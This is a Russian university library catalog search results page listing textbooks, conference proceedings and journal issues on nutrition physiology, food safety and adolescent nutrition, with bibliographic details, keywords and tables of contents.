Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

124 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПИТАНИЕ подростков")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 12
1. 
Позняковский В. М. Безопасность продовольственных товаров (с основами нутрициологии) [Текст] / В. М. Позняковский, 2015. - 270 с.
Ключевые слова 
БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- НУТРИЦИОЛОГИЯ -- ПИТАНИЕ - НАУКА -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ СБАЛАНСИРОВАННОЕ -- ПРОДУКТЫ СПЕЦИАЛЬНОГО НАЗНАЧЕНИЯ -- НОРМА ПОТРЕБЛЕНИЯ ПИЩИ -- ПИТАНИЕ - ЗДОРОВЬЕ -- ЗАГРЯЗНЕНИЕ ПРОДОВОЛЬСТВЕННОГО СЫРЬЯ -- ИНТОКСИКАЦИЯ -- ТОКСИКОИНФЕКЦИЯ -- МИКОТОКСИНЫ -- ЗАГРЯЗНЕНИЕ ХИМИЧЕСКОЕ -- ВЕЩЕСТВО АНТИБАКТЕРИАЛЬННОЕ -- ПРЕПАРАТ ГОРМОНАЛЬНЫЙ -- ДОБАВКА КОРМОВАЯ АЗОТСОДЕРЖАЩАЯ -- ЗАГРЯЗНЕНИЕ ТОКСИЧЕСКОЕ -- ПЕСТИЦИДЫ -- РЕГУЛЯТОР РОСТА РАСТЕНИЙ -- УДОБРЕНИЕ -- ВОДЫ СТОЧНЫЕ -- НИТРАТЫ -- ЗАГРЯЗНЕНИЕ РАДИОАКТИВНОЕ -- ДОБАВКА ПИЩЕВАЯ -- КОНСЕРВАНТ ПИЩЕВОЙ -- БАД -- ПРОДУКТ ГЕНЕТИЧЕСКИ МОДИФИЦИРОВАННЫЙ -- ГМИ -- ФАЛЬСИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТОВ -- БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СТАНДАРТ МЕЖДУНАРОДНЫЙ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ
Держатели документа (Информация об экземплярах) 
2. 
Молчанова Е. Н. Физиология питания [Текст] / Е. Н. Молчанова, 2014. - 240 с.
Ключевые слова 
ФИЗИОЛОГИЯ ПИТАНИЯ -- ПИЩЕВАРЕНИЕ -- ОБМЕН ЭНЕРГЕТИЧЕСКИЙ -- ЭНЕРГОТРАТЫ ОРГАНИЗМА ЧЕЛОВЕКА -- МИКРОНУТРИЕНТЫ -- МАКРОНУТРИЕНТЫ -- БЕЛКИ - ПИТАНИЕ -- ЖИРЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВОДА - ПИТАНИЕ -- КОМПОНЕНТЫ ПИЩИ -- ЦЕННОСТЬ ПИЩЕВАЯ -- МОЛОКО - ПИТАНИЕ -- ПРОДУКТЫ МОЛОЧНЫЕ - ПИТАНИЕ -- ЯЙЦА - ПИТАНИЕ -- ЯЙЦЕПРОДУКТЫ - ПИТАНИЕ -- МЯСО - ПИТАНИЕ -- ПТИЦА - ПИТАНИЕ -- ПРОДУКТЫ МЯСНЫЕ - ПИТАНИЕ -- РЫБА - ПИТАНИЕ -- МОРЕПРОДУКТЫ - ПИТАНИЕ -- ЗЕРНО - ПИТАНИЕ -- ОВОЩИ - ПИТАНИЕ -- ФРУКТЫ - ПИТАНИЕ -- ЯГОДЫ - ПИТАНИЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ - ПИТАНИЕ -- ТЕОРИЯ ПИТАНИЯ НАУЧНАЯ -- ПИТАНИЕ НЕТРАДИЦИОННОЕ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ ПОЖИЛЫХ ЛЮДЕЙ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ КОРМЯЩИХ МАТЕРЕЙ

В учебном пособии изложены основы физиологии пищеварения, значение и функции органов пищеварительной системы, энергетического обмена. Рассмотрены биологическая роль и значение в питании макро- и микронутриентов, биологически активных веществ. Проанализированы различные теории питания и даны научные основы дифференциального питания для отдельных групп населения.

Для студентов высших учебных заведений, обучающихся по специальности "Технология продукции и организация общественного питания" и "Продукты питания из растительного сырья".

3. 
Современное состояние и потенциал развития туризма в России [Электронный ресурс] / ОмГТУ, 2018. - 1 o=эл. опт. диск (CD-ROM)
Оглавление 
  • Ахтямова, А. Ф. Опыт реализации проектного обучения Уфимского государственного нефтяного технического университета для совершенствования системы подготовки кадров в Республике Башкортостан / А. Ф. Ахтямова, А. Б. Фёдорова, А. Ф. Хисамутдинова. - с.4-8.. - Библиогр. в конце ст.
    Кл. слова: Туризм, Образовательный процесс, Междисциплинарное исследование
  • Белова, С. К. Задачи создания благоприятных условий обслуживания маломобильных групп населения: навыки и компетенции работников индустрии гостеприимства и туризма / С. К. Белова. - с.8-14. - Библиогр. в конце ст. : табл.
    Кл. слова: Доступная среда, Кадровый потенциал, Развитие
  • Гайрбекова, Р. С. Особенности развития туризма в Чеченской Республике в современных условиях / Р. С. Гайрбекова. - с.14-19. - Библиогр. в конце ст. : рис.
    Кл. слова: Программа, Регион, Инновации
  • Джумаева, Я. М.-Х. Экономика природоохранной деятельности в туристско-рекреационном комплексе: концепции и принципы реализации / Я. М.-Х. Джумаева. - с.20-25.. - Библиогр. в конце ст.
    Кл. слова: Экономика туризма, Туристский сервис, Экология
  • Иванова, Е. В. Развитие гостиничного бизнеса как фактор роста туризма в Саратовской области / Е. В. Иванова, А. С. Буранко. - с.25-29. - Библиогр. в конце ст. : граф.
    Кл. слова: Гостиница, Турист, Регион
  • Ильясова, К. Х. Тенденции развития экономики / К. Х. Ильясова, Ж. М. Алиева. - с.29-33.. - Библиогр. в конце ст.
    Кл. слова: Экономический рост, Инновации, Вертикальная
  • Кациель, С. А. Брендинг как инновационный инструмент продвижения туристического продукта / С. А. Кациель, С. Ю. Нейман. - с.34-39.. - Библиогр. в конце ст.
    Кл. слова: Бренд, Торговые марки, Турист
  • Морарь, Е. В. Формирование требований к автоматизации деятельности гостиницы / Е. В. Морарь, Г. Р. Фазлыева. - с.40-44. - Библиогр. в конце ст. : рис.
    Кл. слова: Бизнес-процессы гостиницы, Проектирование, Гостиничный сервис
  • Платов, А. В. Влияние социальных медиа на процесс планирования будущей поездки / А. В. Платов, С. К. Тарчоков. - с.45-49.. - Библиогр. в конце ст.
    Кл. слова: Путешествие, Обмен опытом, Социальные сети
  • Поварова, Д. Т. Анализ внутреннего и въездного туризма в России / Д. Т. Поварова, Т. Ю. Чикурова. - с.50-54. - Библиогр. в конце ст. : граф.
    Кл. слова: Развитие, Прогнозы, Статистика
  • Полынский, А. С. Развитие туризма в Омской области в 70 – 80 гг. XX века / А. С. Полынский. - с.55-60.. - Библиогр. в конце ст.
    Кл. слова: Туристический ресурс, Экскурсии, Туристический маршрут
  • Сампиева, Л. Д. Управление рисками в туризме / Л. Д. Сампиева, М. Т. Кагирова. - с.61-65.. - Библиогр. в конце ст.
    Кл. слова: Риск-менеджмент, План развития, Туристическая фирма
  • Седова, Н. А. Компетентностная модель профессиональной подготовки специалистов для экскурсионной сферы / Н. А. Седова. - с.65-69.. - Библиогр. в конце ст.
    Кл. слова: Экскурсовод, Модуль, Конкурентоспособность
  • Сергеенко, Г. Г. Развитие туристских услуг в Республике Татарстан / Г. Г. Сергеенко [и др.]. - с.69-74. - Библиогр. в конце ст. : граф.
    Другие авторы: Матвеева Е. Л., Коростелева В. П., Малеева Э. Ю.
    Кл. слова: Туроператор, Внутренний туризм, Турист
  • Смагулов, Б. К. Қазақстан Республикасы мен Ресей Федерациясының арасындағы этнографиялық туризмдi дамыту мүмкіндіктері / Б. К. Смагулов, Е. В. Кулагина, Э. Чифтчи. - с.75-78.. - Библиогр. в конце ст.
  • Чистяков, М. С. Медицинский аспект в дифференциации туристического пула и развитии туристической дестинации (рекреационного оздоровления) / М. С. Чистяков. - с.78-85. - Библиогр. в конце ст. : табл.
    Кл. слова: Этические нормы, Медицинские услуги, Здоровье
  • Шахов, Б. В. Региональное планирование и реализация программ развития туризма в Алтайском крае / Б. В. Шахов, О. В. Лукина. - с.85-90. - Библиогр. в конце ст. : табл.
    Кл. слова: Туристический ресурс, Государственная программа, Регион
  • Щерёдина, А. А. Маркетинг территорий через каналы цифрового маркетинга / А. А. Щерёдина, К. Н. Трашкова. - с.90-94.. - Библиогр. в конце ст.
    Кл. слова: Ddigital-маркетинг, Цифровые каналы, Продвижение
  • Эльбиева, Л. Р. Кадровая политика предприятий в индустрии туризма / Л. Р. Эльбиева. - с.95-100.. - Библиогр. в конце ст.
    Кл. слова: Труд, Въездной туризм, Туроператор
  • Эльбиева, Л. Р. Экотуризм / Л. Р. Эльбиева, Ф. Д. Ужахова. - с.100-105.. - Библиогр. в конце ст.
    Кл. слова: Экология, Природа, Сотрудничество
  • Кулагина, Е. В. Гостиничная и туристская инфраструктура агро–туристского–рекреационного комплекса Омской области / Е. В. Кулагина, И. Е. Карасев, Ю. Р. Солодовникова. - с.106-115.. - Библиогр. в конце ст.
    Кл. слова: Гостиничная инфраструктура, Сельский туризм, Туристский отдых
  • Лукина, О. В. Сельский туризм в системе трансграничного сотрудничества России и Казахстана / О. В. Лукина, Г. С. Алгалиева. - с.115-120. - Библиогр. в конце ст. : рис.
    Кл. слова: Развитие туризма, Регион, Развитие
  • Хохлова, О. В. Элементы экосистемы в туризме (на примере детского туризма) / О. В. Хохлова, Н. А. Седова. - с.120-124.. - Библиогр. в конце ст.
    Кл. слова: Биологическая экосистема, Бизнес–экосистема, Взаимосвязь
  • Довгань, О. В. Роль физической подготовки, спорта и экотуризма в формировании и укреплении здоровья учащейся молодежи в гуманитарном вузе / О. В. Довгань. - с.125-129.. - Библиогр. в конце ст.
    Кл. слова: Здоровье молодежи, Физические нагрузки, Укрепление здоровья
  • Кубрина, Л. В. Индикация аэротехногенного загрязнения природных территорий города Омска (по данным изучения сосны обыкновенной) / Л. В. Кубрина, Е. А. Супиниченко. - с.129-131.. - Библиогр. в конце ст.
    Кл. слова: мониторинг, биондикация, охраняемая территория
  • Соловьев, С. А. Сохранение колоний кудрявого пеликана в Омской области, как потенциал для развития экотуризма в регионе / С. А. Соловьев, И. А. Швидко, С. С. Соловьев. - с.132-138. - Библиогр. в конце ст. : фот. цв.
    Кл. слова: Омский аэропорт, Браконьерство, Бердвотчинг
  • Тюменцева, Е. Ю. Мониторинг рекреационных территорий г. Омска / Е. Ю. Тюменцева. - с.138-143.. - Библиогр. в конце ст.
    Кл. слова: Физико–химический анализ, Биондикация, Загрязнения
  • Большунова, Т. В. Использование событийного туризма для развития туристского потенциала Липецкой области / Т. В. Большунова. - с.144-151.. - Библиогр. в конце ст.
    Кл. слова: Гастрономический туризм, Историческая реконструкция, Этнографический туризм
  • Воробьева, Н. И. Ярославские музеи глазами туристов / Н. И. Воробьева. - с.151-156. - Библиогр. в конце ст. : рис.
    Кл. слова: Рейтинг, Отзывы туристов, Спросом на услуги
  • Гордик, А. С. Проект создания тура в Крым для лиц зрелого возраста / А. С. Гордик, Н. В. Косарева. - с.156-162. - Библиогр. в конце ст. : табл.
    Кл. слова: Социальный туризм, Ретротур, Пенсионер
  • Есипова, С. А. Артефакты древних цивилизаций как объекты культурно–познавательного туризма в российской Арктике / С. А. Есипова, М. А. Дудич. - с.163-168. - Библиогр. в конце ст. : табл.
    Кл. слова: Культура, Народы северв, Этнос
  • Елаева, А. Э. Анализ и перспективы развития событийного туризма в республике Тыва / А. Э. Елаева, Н. В. Косарева. - с.168-173.. - Библиогр. в конце ст.
    Кл. слова: Туристский потенциал, Туристская инфраструктура, Фестиваль
  • Карасев, И. Е. Туристский потенциал Называевского района Омской области / И. Е. Карасев, Е. В. Мельникова. - с.174-178.. - Библиогр. в конце ст.
    Кл. слова: Историю района, Природные ресурсы, Достопримечательность
  • Климанова, К. С. Роль событийного туризма в развитии Омского региона / К. С. Климанова. - с.178-182.. - Библиогр. в конце ст.
    Кл. слова: Культурное мероприятие, Форум ритм, Омская область
  • Малинина, А. В. Этнографический потенциал Азовского и Большереченского районов Омской области / А. В. Малинина. - с.182-186.. - Библиогр. в конце ст.
    Кл. слова: Этнографический туризм, Туристский ресурс, Регион
  • Прасолов, В. С. Событийный туризм: тенденции регионального развития / В. С. Прасолов, С. А. Кациель. - с.186-190. - Библиогр. в конце ст. : рис.
    Кл. слова: Регионы России, Мероприятия, Привлечение туристов
  • Солодовникова, Ю. Р. Специфика туристского потенциала Омской области как основа формирования туристской привлекательности определенной территории / Ю. Р. Солодовникова, Е. В. Кулагина. - с.191-195.. - Библиогр. в конце ст.
    Кл. слова: Туристские объекты, Туристские ресурсы, Привлекательность
  • Хамнаева, Н. И. О современных технологиях Этнографического музея народов Забайкалья / Н. И. Хамнаева [и др.]. - с.196-201. - Библиогр. в конце ст. : табл.
    Другие авторы: Зверькова Я. А., Холодова Е. А., Ардаева Д. Б.
    Кл. слова: Туризм, QR–код, История края
  • Хамнаева, Н. И. Об особенностях развития приключенческого туризма в Республике Бурятии / Н. И. Хамнаева, А. И. Россихин, П. П. Смагло. - с.201-205. - Библиогр. в конце ст. : граф.
    Кл. слова: Активный отдых, Развитие экономики, Туристическая деятельность
  • Асрандина, Г. Х. Применение казахской кухни на предприятиях в городе Астрахани / Г. Х. Асрандина, М. А. Шадрин. - с.206-209.. - Библиогр. в конце ст.
    Кл. слова: Питание, Национальная кухня, Ресторанный сервис
  • Бураковская, Н. В. Мониторинг рынка индустрии питания в России / Н. В. Бураковская. - с.210-212. - Библиогр. в конце ст. : граф.
    Кл. слова: Рынк, Ресторанный бизнес, Предприятие
  • Гаврилкина, Е. Н. Особенности организации питания учащихся колледжей / Е. Н. Гаврилкина, В. В. Бронникова. - с.212-217. - Библиогр. в конце ст. : табл.
    Кл. слова: Питание подростков, Меню, Рацион питания
  • Есипова, С. А. Анализ развития сферы общественного питания в муниципальных образованиях Ханты–Мансийского автономного округа – Югры с целью использования в туризме / С. А. Есипова, М. А. Дудич. - с.218-221.. - Библиогр. в конце ст.
    Кл. слова: Инвестиционный туризм, Организация питания, Решение проблем
  • Феденко, А. А. Преимущества кластеров предприятий питания в рамках стратегий регионального развития / А. А. Феденко, Ж. В. Новикова. - с.222-226.. - Библиогр. в конце ст.
    Кл. слова: Конкуренция, Общественное питание, Региональная экономика
  • Бекова, Д. Ж. Казахская национальная кухня как фактор успешного предприятия индустрии питания в г. Курган / Д. Ж. Бекова, М. А. Шадрин. - с.226-229.. - Библиогр. в конце ст.
    Кл. слова: Общественное питание, Кулинарные обычаи, Конкурент
  • Благодарнова, А. А. Анализ ресторанов итальянской кухни в г. Сургуте / А. А. Благодарнова, М. А. Шадрин. - с.230-233.. - Библиогр. в конце ст.
    Кл. слова: Ресторанный сервис, Индустрия питания, Досуг
  • Богочанов, Н. С. Актуальность открытия кафе с итальянской кухней в г. Пенза / Н. С. Богочанов, М. А. Шадрин. - с.233-236.. - Библиогр. в конце ст.
    Кл. слова: Ресторан, Специфика, Население
  • Волков, Е. А. Анализ ресторанов в городе Новороссийске / Е. А. Волков, М. А. Шадрин. - с.236-239.. - Библиогр. в конце ст.
    Кл. слова: Питание, Продукты питания, Система качества продукции
  • Ильин, П. А. Анализ развития кафе с грузинской кухней в г. Татарске / П. А. Ильин, М. А. Шадрин. - с.239-242.. - Библиогр. в конце ст.
    Кл. слова: Индустрия питания, Общественное питание, Персонал
  • Козинкина, Т. Ю. Китайская кухня: перспективы, особенности развития в городе Иркутске / Т. Ю. Козинкина, М. А. Шадрин. - с.243-246.. - Библиогр. в конце ст.
    Кл. слова: Индустрия питания, Анализ рынка предприятий, Туризм
  • Кузнецова, Ю. Р. Фаст–фуд как фактор развития индустрии питания на примере города Ханты–Мансийска / Ю. Р. Кузнецова, М. А. Шадрин. - с.246-249.. - Библиогр. в конце ст.
    Кл. слова: Кафе, Обслуживание, Быстрое питание
  • Кусумбаева, У. М. Основные тенденции развития кафе с итальянской кухни в городе Новосибирск / У. М. Кусумбаева, М. А. Шадрин. - с.250-253.. - Библиогр. в конце ст.
    Кл. слова: Модели питания, Индустрия питания, Туризм
  • Маликова, Я. Н. Основные тенденции использования кавказской кухни на предприятиях индустрии питания в г. Сургуте / Я. Н. Маликова, М. А. Шадрин. - с.253-256.. - Библиогр. в конце ст.
    Кл. слова: Ресторан, Предприятие массового питания, Общественное питание
  • Нигманова, М. Р. Основное направление развития кафе–пекарни в городе Санкт–Петербурге / М. Р. Нигманова, М. А. Шадрин. - с.256-259.. - Библиогр. в конце ст.
    Кл. слова: Питание, Индустрия питания, Кондитерские изделия
  • Нурмаганова, С. Н. Основные направления развития предприятия индустрии питания французской кухни в г. Кемерово / С. Н. Нурмаганова, М. А. Шадрин. - с.260-263.. - Библиогр. в конце ст.
    Кл. слова: Модели питания, Французская гастрономия, Туризм
  • Павловская, И. О. Основные тенденции и перспективы развития кафе–блинных в г. Сургуте / И. О. Павловская, М. А. Шадрин. - с.263-266.. - Библиогр. в конце ст.
    Кл. слова: Питание, Индустрия питания, Фуд–корт
  • Потанина, С. В. Русская кухня: перспективы и тенденции развития г. Сургута / С. В. Потанина, М. А. Шадрин. - с.266-269.. - Библиогр. в конце ст.
    Кл. слова: Индустрия питания, Традиционные русские блюда, История
  • Пухова, Ю. О. Основные направления развития предприятий индустрии питания кавказской кухни в г. Красноярске / Ю. О. Пухова, М. А. Шадрин. - с.270-273.. - Библиогр. в конце ст.
    Кл. слова: Кафе, Ресторан, Сервис
  • Сахнова, М. Ю. Основные тенденции использования европейской кухни на предприятиях индустрии питания в г. Магадане / М. Ю. Сахнова, М. А. Шадрин. - с.273-276.. - Библиогр. в конце ст.
    Кл. слова: Продукты питания, Кафе, Здоровое питание
  • Смирнов, А. С. Значение славянской кухни для общественного питания в городе Новосибирск / А. С. Смирнов, М. А. Шадрин. - с.276-280.. - Библиогр. в конце ст.
    Кл. слова: Спрос населения, Повышение качества продукции, Персонал
  • Толмачева, А. Д. Динамика развития ресторана с европейской кухней в городе Казань / А. Д. Толмачева, М. А. Шадрин. - с.280-285.. - Библиогр. в конце ст.
    Кл. слова: Организация обслуживания, Индустрия питания, Туризм
  • Троценко, Л. Ю. Украинская кухня: основные направления и особенности в г. Краснодар / Л. Ю. Троценко, М. А. Шадрин. - с.285-288.. - Библиогр. в конце ст.
    Кл. слова: Кафе, Питание, Уровнь жизни
  • Ширяев, А. Е. Интересы рестораторов к итальянской кухне в городе Уссурийск / А. Е. Ширяев, М. А. Шадрин. - с.288-291.. - Библиогр. в конце ст.
    Кл. слова: Предприятие, Индустрия питания, Меню
Держатели документа (Информация об экземплярах) 

Издание содержит доклады специалистов сферы туризма, гостеприимства и общественного питания, преподавателей высших учебных заведений России, магистрантов и студентов по проблемам организационно-экономического, правового и кадрового обеспечения туристской индустрии; потенциала и основных направлений развития аграрного, детско-юношеского и молодежного туризма в России; развития экотуризма в России и на сопредельных территориях; культурно-познавательного и событийного туризма в регионах России; развития индустрии питания России.

Предназначено студентам, аспирантам, магистрантам и преподавателям высших учебных заведений по направлениям "Туризм" и "Гостиничное дело".

Полный текст
4. 
СОЦИС (Социологические исследования). - Журнал, 2008г. № 10
Оглавление 
  • Романовский, Н. В. Историзация - закономерность развития социологической теории / Н. В. Романовский. - с.3-12
    Кл. слова: ИСТОРИЗАЦИЯ
  • Зарубина, Н. Н. Деньги и культура богатства: перспективы социальной ответственности бизнеса в условиях глобализаций / Н. Н. Зарубина. - с.13-23
    Кл. слова: КУЛЬТУРА БОГАТСТВА, ОТВЕТСТВЕННОСТЬ СОЦИАЛЬНАЯ, БОГАТСТВО - СОЦИОЛОГИЯ
  • Карпичев, В. С. Идея неравновесности - возможности для социологии / В. С. Карпичев. - с.23-28
    Кл. слова: НЕРАВНОВЕСНОСТЬ
  • Жуков, В. И. Россия в глобальной системе социальных координат: социологический анализ и прогноз / В. И. Жуков. - с.29-40
    Кл. слова: МОДЕРНИЗАЦИЯ ЭКОНОМИКИ, СИСТЕМА СОЦИАЛЬНАЯ, РОССИЯ - СОЦИОЛОГИЯ
  • Староверов, В. И. К истории возрождения российской сельской социологии / В. И. Староверов. - с.40-46
    Кл. слова: СОЦИОЛОГИЯ СЕЛЬСКАЯ
  • Бектурганов, К. Б. О становлении и развитии социологии в Кыргызстане / К. Б. Бектурганов. - с.46-51
    Кл. слова: КЫРГЫЗСТАН, СОЦИОЛОГИЯ - ИСТОРИЯ
  • Решетникова, К. В. Методологические основы квалификации технологий управления организационными конфликтами / К. В. Решетникова. - с.52-61
    Кл. слова: КОНФЛИКТ ОРГАНИЗАЦИОННЫЙ, УПРАВЛЕНИЕ КОНФЛИКТОМ, СТИМУЛИРОВАНИЕ
  • Новокрещёнов, А. В. Кадровый состав местных органов власти: отбор кандидатов и их мотивация поступления на муниципальную службу / А. В. Новокрещёнов. - с.62-67
    Кл. слова: ВЛАСТЬ МУНИЦИПАЛЬНАЯ, ОТБОР ПЕРСОНАЛА, МОТИВАЦИЯ ПЕРСОНАЛА
  • Криничанский, К. В. Российский город в условиях социально-экономической трансформации / К. В. Криничанский. - с.68-73
    Кл. слова: РАЗВИТИЕ РЕГИОНАЛЬНОЕ, ГОРОД - ЭКОНОМИКА, ПОЛИТИКА РЕГИОНАЛЬНАЯ
  • Киселева, А. М. Развитие территориального общественного самоуправления в крупном городе / А. М. Киселева. - с.73-80
    Кл. слова: ТОС , САМОУПРАВЛЕНИЕ ТЕРРИТОРИАЛЬНОЕ, САМОУПРАВЛЕНИЕ ОБЩЕСТВЕННОЕ
  • Рыбаковский, Л. Л. Сравнительная оценка демографического неблагополучия регионов России / Л. Л. Рыбаковский. - с.81-87
    Кл. слова: СИТУАЦИЯ ДЕМОГРАФИЧЕСКАЯ, РЕГИОНЫ ПРОБЛЕМНЫЕ - РОССИЯ, РОЖДАЕМОСТЬ - ДЕМОГРАФИЯ
  • Жакевич, В. Д. Миграционные настроения в странах СНГ (по итогам международного исследования) / В. Д. Жакевич. - с.88-96
    Кл. слова: МИГРАЦИЯ НАСЕЛЕНИЯ, МИГРАЦИЯ - СНГ, МИГРАЦИЯ ТРУДОВАЯ
  • Юдина, О. А. Численность и демографические особенности средних слоев российского общества / О. А. Юдина. - с.96-103
    Кл. слова: ДЕМОГРАФИЯ - РОССИЯ, КЛАСС СРЕДНИЙ, ЧИСЛЕННОСТЬ НАСЕЛЕНИЯ - РОССИЯ
  • Шеметова, Е. В. Питание школьников Приморского края: реальность и перспективы / Е. В. Шеметова, Н. В. Щеникова. - с.133-139
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ, ПИТАНИЕ ДЕТЕЙ, ПИТАНИЕ ПОДРОСТКОВ
  • Шклярук, В. Я. Самосохранительное поведение в молодежной среде / В. Я. Шклярук. - с.139-142
    Кл. слова: САМОСОХРАНЕНИЕ, МОЛОДЕЖЬ - РОССИЯ, МОЛОДЕЖЬ - ОБЩЕСТВО
  • Фомин, Ю. А. Влияние российского спорта на формирование личности / Ю. А. Фомин. - с.143-146
    Кл. слова: ФОРМИРОВАНИЕ ЛИЧНОСТИ, СПОРТ - СОЦИОЛОГИЯ
Держатели документа (Информация об экземплярах) 
5. 
Вопросы питания. - Журнал, 2010г. № 2
Оглавление 
  • Состояние гигиенической подготовки работников, занятых в сфере общественного питания: социологическое исследование / ; В. А. Полесский, М. И. Красильщиков, Е. М. Осипова и др.. - с.19-23
    Кл. слова: РАБОТНИК, ПИТАНИЕ ОБЩЕСТВЕННОЕ - КАДРЫ, ГИГИЕНА ПИТАНИЯ
  • Использование биологически активной добавки к пище на основе липидов морских гидробионтов в эксперименте на крысах / ; Т. П. Новгородцева, Т. А. Гвозденко, С. П. Касьянов и др.. - с.24-27
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНАЯ, БАД
  • Улумбекова, Г. Э. Здоровье населения в Российской Федерации: факторы риска и роль здорового питания / Г. Э. Улумбекова. - с.33-38
    Кл. слова: ЗДОРОВЬЕ НАСЕЛЕНИЯ, ПИТАНИЕ ЗДОРОВОЕ, СМЕРТНОСТЬ
  • Решетников, О. В. Режим питания как фактор риска диспептической симптоматики у подростков: 2-летнее проспективное исследование / О. В. Решетников, С. А. Курилович, М. Ю. Денисов. - с.39-42
    Кл. слова: ПИТАНИЕ ПОДРОСТКОВ, ГАСТРИТ
  • Клинико-метаболические показатели и витаминная обеспеченность больных сахарным диабетом типа 2 при включении в диету витаминно-минерального комплекса / ; О. А. Плотникова, Х. Х. Шарафетдинов, В. В. Зыкина и др.. - с.54-59
    Кл. слова: ДИАБЕТ САХАРНЫЙ, ВИТАМИНЫ - ПИТАНИЕ, ПИТАНИЕ ЛЕЧЕБНОЕ
Держатели документа (Информация об экземплярах) 
6. 
Доценко В. А. Практическое руководство по санитарному надзору за предприятиями пищевой и перерабатывающей промышленности, общественного питания и торговли [Текст] / В. А. Доценко, 2013. - 831 с.
Ключевые слова 
НАДЗОР САНИТАРНО-ЭПИДЕМИОЛОГ -- ПИТАНИЕ - ЗДОРОВЬЕ -- ПИТАНИЕ ОБЩЕСТВЕННОЕ - Надзор -- Паспорт санитарный -- ЭКСПЕРТИЗА САНИТАРНО-ЭПИДЕМИ -- ПИТАНИЕ ЛЕЧЕБНО-ПРОФИЛАКТИЧЕСКОЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- МАГАЗИН продовольственный -- РЫНОК ПРОДОВОЛЬСТВЕННЫЙ -- ПРЕДПРИЯТИЕ ПИЩЕВОЙ ПРОМЫШЛЕННОСТИ -- ПРЕДПРИЯТИЕ ПЕРЕРАБАТЫВАЮЩЕЕ -- ДОБАВКА ПИЩЕВАЯ -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНАЯ -- Продукт органический -- СРОК ГОДНОСТИ ПИЩЕВЫХ ПРОДУКТОВ -- Условия хранения пищевых продуктов -- ОТРАВЛЕНИЕ ПИЩЕВОЕ
Оглавление 
  • СанПин 2.3.2.1078-01. Гигиенические требования безопасности и пищевой ценности пищевых продуктов. - с.681-755
  • Федеральный закон "О защите прав юридических лиц и индивидуальных предпринимателей при осуществлении государственного контроля (надзора) и муниципального надзора". - с.756-780
  • Правила предоставления уведомлений о начале осуществления отдельных видов предпринимательской деятельности и учета оказанных уведомлений. - с.782-784
  • Формы основных административных регламентов Роспотребнадзора по проведению проверок пищевых предприятий. - с.787-815
  • Порядок оказания медицинской помощи населению по профилю "Диетология". - с.816-823
  • Основы государственной политики Российской Федерации в области здорового питания населения на период до 2020 года. - с.824-827
  • Утвержденные методы определений контролируемых показателей. - с.828-831
Держатели документа (Информация об экземплярах) 
7. 
Павлоцкая, Лариса Федоровна. Физиология питания : учебник для студентов технологических и товароведческих факультетов торговых вузов, обучающихся по специальности 1011 "Технология и организация общественного питания" / Л. Ф. Павлоцкая, Н. В. Дуденко, М. В. Эйдельман, 1989. - 368 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
8. 
Основы микробиологии, физиологии питания и санитарии для общепита [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт. сост. Т. П. Трушина, 2000. - 382 с.
Ключевые слова 
БАКТЕРИЯ -- ГРИБЫ плесневые -- ДРОЖЖИ -- ВИРУС -- Фаги -- МИКРООРГАНИЗМ -- Брожение -- ФИЗИОЛОГИЯ питания -- МИКРОФЛОРА -- Пищеварение -- Белки -- Жиры -- Углеводы -- Витамины -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- Обмен веществ -- Режим питания -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ пожилых людей -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ студентов -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА общественного питания -- ПРАВИЛА САНИТАРНЫЕ в общепите -- НАДЗОР санитарно-пищевой
9. 
Каня И. П. Физиология питания [Текст] : учеб. пособие для студентов специальности 260501 "Технология продуктов общественного питания" / И. П. Каня, 2007. - 344 с.
Ключевые слова 
